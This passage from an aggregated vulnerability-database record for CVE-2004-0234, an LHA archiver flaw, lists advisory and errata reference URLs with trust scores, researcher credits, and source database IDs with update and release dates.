Trust: 1.7

url:http://www.guay-leroux.com/projects/barracuda-advisory-lha.txt

Trust: 1.7

url:http://www.osvdb.org/5753

Trust: 1.7

url:http://www.osvdb.org/5754

Trust: 1.7

url:http://www.redhat.com/support/errata/rhsa-2004-178.html

Trust: 1.7

url:http://www.redhat.com/support/errata/rhsa-2004-179.html

Trust: 1.7

url:http://secunia.com/advisories/19514

Trust: 1.7

url:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000840

Trust: 1.6

url:http://www.frsirt.com/english/advisories/2006/1220

Trust: 1.4

url:http://xforce.iss.net/xforce/xfdb/16012

Trust: 1.4

url:http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:977

Trust: 1.4

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a977

Trust: 1.1

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9881

Trust: 1.1

url:http://www.vupen.com/english/advisories/2006/1220

Trust: 1.1

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/16012

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2004-0234

Trust: 0.9

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2004-0234

Trust: 0.8

url:http://osvdb.org/5753

Trust: 0.8

url:http://osvdb.org/5754

Trust: 0.8

url:http://marc.theaimsgroup.com/?l=bugtraq&m=108422737918885&w=2

Trust: 0.6

url:http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:9881

Trust: 0.6

url:http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/

Trust: 0.4

url:http://www.barracudanetworks.com/ns/products/spam_overview.php

Trust: 0.3

url:http://www.stalker.com/cgpmcafee/

Trust: 0.3

url:http://www.f-secure.com/security/fsc-2004-1.shtml

Trust: 0.3

url:http://mail.stalker.com/lists/cgatepro/message/61244.html

Trust: 0.3

url:http://images.mcafee.com/misc/mcafee_security_bulletin_05-march-17.pdf

Trust: 0.3

url:http://rhn.redhat.com/errata/rhsa-2004-178.html

Trust: 0.3

url:http://rhn.redhat.com/errata/rhsa-2004-219.html

Trust: 0.3

url:http://www.rarsoft.com/

Trust: 0.3

url:http://www.winzip.com/

Trust: 0.3

url:/archive/1/366265

Trust: 0.3

url:http://secunia.com/secunia_security_advisories/

Trust: 0.2

url:http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

Trust: 0.2

url:http://secunia.com/about_secunia_advisories/

Trust: 0.2

url:http://secunia.com/advisories/19002/

Trust: 0.2

url:http://marc.info/?l=bugtraq&m=108422737918885&w=2

Trust: 0.1

url:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000840

Trust: 0.1

url:http://lists.grok.org.uk/pipermail/full-disclosure/2006-april/044875.html

Trust: 0.1

url:http://secunia.com/product/4639/

Trust: 0.1

url:http://secunia.com/advisories/19514/

Trust: 0.1

url:http://lists.grok.org.uk/pipermail/full-disclosure/2006-april/044874.html

Trust: 0.1

url:http://secunia.com/advisories/11510/

Trust: 0.1

url:http://shellcode.org/audit/

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2004-0234

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2004-0235

Trust: 0.1

url:http://idiosynkratisk.tk/

Trust: 0.1

url:http://www.advogato.org/person/metaur/

Trust: 0.1

url:http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm

Trust: 0.1

url:http://www2m.biglobe.ne.jp/~dolphin/lha/prog/

Trust: 0.1

url:http://secunia.com/product/8297/

Trust: 0.1

url:http://www.guay-leroux.com/projects/zoo-advisory.txt

Trust: 0.1

url:http://www.barracudanetworks.com/

Trust: 0.1

url:http://www.guay-leroux.com

Trust: 0.1

sources: VULHUB: VHN-8664 // BID: 10243 // JVNDB: JVNDB-2004-000169 // PACKETSTORM: 45159 // PACKETSTORM: 33241 // PACKETSTORM: 44104 // PACKETSTORM: 45164 // CNNVD: CNNVD-200408-202 // NVD: CVE-2004-0234

CREDITS

Ulf Harnhammar (ulfh@update.uu.se); Jean-Sébastien Guay-Leroux (jean-sebastien@guay-leroux.com)

Trust: 0.6

sources: CNNVD: CNNVD-200408-202

SOURCES

db: VULHUB | id: VHN-8664
db: BID | id: 10243
db: JVNDB | id: JVNDB-2004-000169
db: PACKETSTORM | id: 45159
db: PACKETSTORM | id: 33241
db: PACKETSTORM | id: 44104
db: PACKETSTORM | id: 45164
db: CNNVD | id: CNNVD-200408-202
db: NVD | id: CVE-2004-0234

LAST UPDATE DATE

2024-08-14T12:26:28.416000+00:00


SOURCES UPDATE DATE

db: VULHUB | id: VHN-8664 | date: 2017-10-11T00:00:00
db: BID | id: 10243 | date: 2009-07-12T04:07:00
db: JVNDB | id: JVNDB-2004-000169 | date: 2008-05-21T00:00:00
db: CNNVD | id: CNNVD-200408-202 | date: 2007-05-22T00:00:00
db: NVD | id: CVE-2004-0234 | date: 2017-10-11T01:29:24.730

SOURCES RELEASE DATE

db: VULHUB | id: VHN-8664 | date: 2004-08-18T00:00:00
db: BID | id: 10243 | date: 2004-04-30T00:00:00
db: JVNDB | id: JVNDB-2004-000169 | date: 2008-05-21T00:00:00
db: PACKETSTORM | id: 45159 | date: 2006-04-04T19:25:51
db: PACKETSTORM | id: 33241 | date: 2004-05-04T04:25:06
db: PACKETSTORM | id: 44104 | date: 2006-02-25T00:55:07
db: PACKETSTORM | id: 45164 | date: 2006-04-04T19:39:53
db: CNNVD | id: CNNVD-200408-202 | date: 2004-04-30T00:00:00
db: NVD | id: CVE-2004-0234 | date: 2004-08-18T04:00:00